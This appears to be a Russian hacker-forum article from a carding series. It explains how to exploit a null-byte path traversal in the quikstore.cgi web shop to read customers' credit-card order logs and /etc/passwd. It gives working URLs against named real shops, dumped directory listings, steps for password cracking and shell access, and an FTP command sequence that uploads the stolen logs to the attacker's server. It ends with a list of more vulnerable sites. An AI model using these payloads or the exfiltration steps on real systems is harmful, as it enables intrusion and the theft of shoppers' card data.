Привет, господа хакеры, вот вам продолжение серии моих статей "Как поиметь кред", и, если все будет оки, то буду писать стати на тему имения кред раз в неделю. Ладно, не буду вас парить такими темами, приступим сразу к делу.

Итак, что вам понадобится для взлома веб шопа?
1 - компьютер и доступ в интернет
2 - чутка ума
3 - умение пользоваться поисковой системой
4 - прочитать эту статью

Сегодня я буду вам рассказывать про тактику взлома quikstore.cgi. Quikstore это буржуйский веб шоп очень хорошего качества, его долго делали и много народа старалось над его разработкой, как обычно, перестарались, допустив в нем очень полезную для хакеров ошибку. Сколько не говорили про ошибку в нулевом символе, многие до сих пор ее не поняли. Итак, вот вам пример уязвимости:

http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../%00html&cart_id=

Набрав у себя в браузере этот адрес, вы увидите, что-то типа 

½Y. ...8.. ...ˆK....html½.À©Y...
access.logÀ.Y....check_setup.cgi.
Y...email_addresses.log°Y... language.cfg.þÚ¾Y...
quikstore.cfg.Â.Y... quikstore.cgiþÚ.öG..

Конечно, мусора много, но разобраться в названиях можно. Посмотрев на всякие названия, мы видим каталог orders, пора нам в него зайти 

http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/%00html&cart_id=

Ага, и мы видим:

.H ....Y. ...(.H.. 599201.logА,.H.. 154519.logА-.H..
985367.logА..H.. 865125.logА/.H.. 315856.logА0.H..
937483.logА1.H.. 378887.logА2.H.. 169435.logА3.H..
479192.logА4.H.. 257362.logА5.H.. 115183.logА6.H..
11395.log.А7.H.. 167788.logА8.H.. 559841.logА9.H..
917539.logА:.H.. 354163.logА;.H.. 299892.logА<.H..
280139.logА=.H...5817.log..А>.H.. 350266.logА?.H..
26773.log.А@.H.. 360859.logАA.H.. 199829.logАB.H..
832283.logАC.H.. 412408.logАD.H.. 508280.logАE.H..
456098.logАF.H.. 126968.logАG.H.. 183660.logАH.H..
569004.logАI.H.. 772139.logАJ.H.. 103115.logАK.H..
654675.logАL.H.. 884681.logАM.H.. 638658.logАO.H..
188875.logАP.H.. 225653.logАN.H.. 753313.logАQ.H..
898714.logАR.H.. 188818.logАS.H.. 439711.logАT.H..
927352.logАU.H.. 431996.logА..H.. 672967.logА..H..
159103.logА..H.. 830744.logА).H.. 566537.logА*.H..
253144.logА+.H ..5138.log..А..H.. 663457.logА..H..
586008.logА..H.. 997506.logА..H.. 856583.logА..H..
693685.logА..H.. 655797.logА..H.. 814237.logА..H..
882103.logА..H.. 443014.logА..H.. 380792.logА..H..
368613.logА..H.. 914079.logА..H.. 773799.logА..H..
267996.logА..H.. 57162.log.А..H.. 882551.logА..H..
259987.logА..H.. 312268.logА..H.. 994056.logА..H..
281473.logА..H.. 726034.logА..H.. 566936.logА..H..
558117.logА..H.. 317098.logА .H . 238429.logА-.H..
63477.log.А+.H.. 802520.logА..H.. 938229.logА?.H..
351224.logА+.H.. 390858.logА..H.. 735378.logА..H..
221629.logАЁ.H.. 15072.log.А©.H.. 90119.log.А¦.H..
823612.logА?.H.. 347629.logА..H.. 891608.logА..H...
514696.logА

Ага, много файлов с расширением .log, это и есть на самом деле вожделенные сс!! Теперь просто вводим имя файла в наш урл и видим всю инфу о сс. Вот смотрите:
http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/898714.log% 00html&cart_id=

Но в формате, в котором все это выдается, смотреть неудобно, поэтому мы просматриваем исходники html странички и видим все рассортированное в удобном формате! Часто бывает такая фича, что нельзя просматривать каталоги, а значит нельзя увидеть номера файлов с кредами, чтобы их просмотреть нужно попробовать сделать вот как:

http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../../../../../../../../ etc/passwd%00html&cart_id=

Ага что мы поимели?? А угадайте с 3-ех раз :). Лана, для тех кто в бронетанке скажу, что мы поимели пассы этого сервака. Теперь просто кормим их john the ripper и ломимся через шелл. Но сначала подбираем пасс от юзера, которому разрешен шелл! А далее, найдя wwwroot и зайдя там в каталог orders, мы командируем

ftp
потом пишем open www.may-ftp-server.com
user *****
pas *****
put *.log

Ага, порядок. Мы закачали все файлы с расширением log к себе на фтп. Ессно с фтп мы можем слить все, что угодно, к примеру, какой-нибудь скрипт... Да, кстати, если вы подберете пасс от рута, то вы можете рулить серваком, как захотите (это для самых умных сказано)!!!

Ну и напоследок пару ссылочек с дырами:

http://www.lockpickers.com/cgi-bin/quikstore.cgi?
page=../orders/898714.log%00html&cart_id=
http://www.sterlingjudaica.com/cgi-bin/quikstore.cgi?
page=../orders/%00html&cart_id=
http://www.doityourselfpestctrl.com/cgi-
bin/quikstore.cgi?page=../orders/%00html&cart_id=
http://www.wellmanandwelsch.com/cgibin/quikstore.cgi?
page=../orders%00html&cart_id=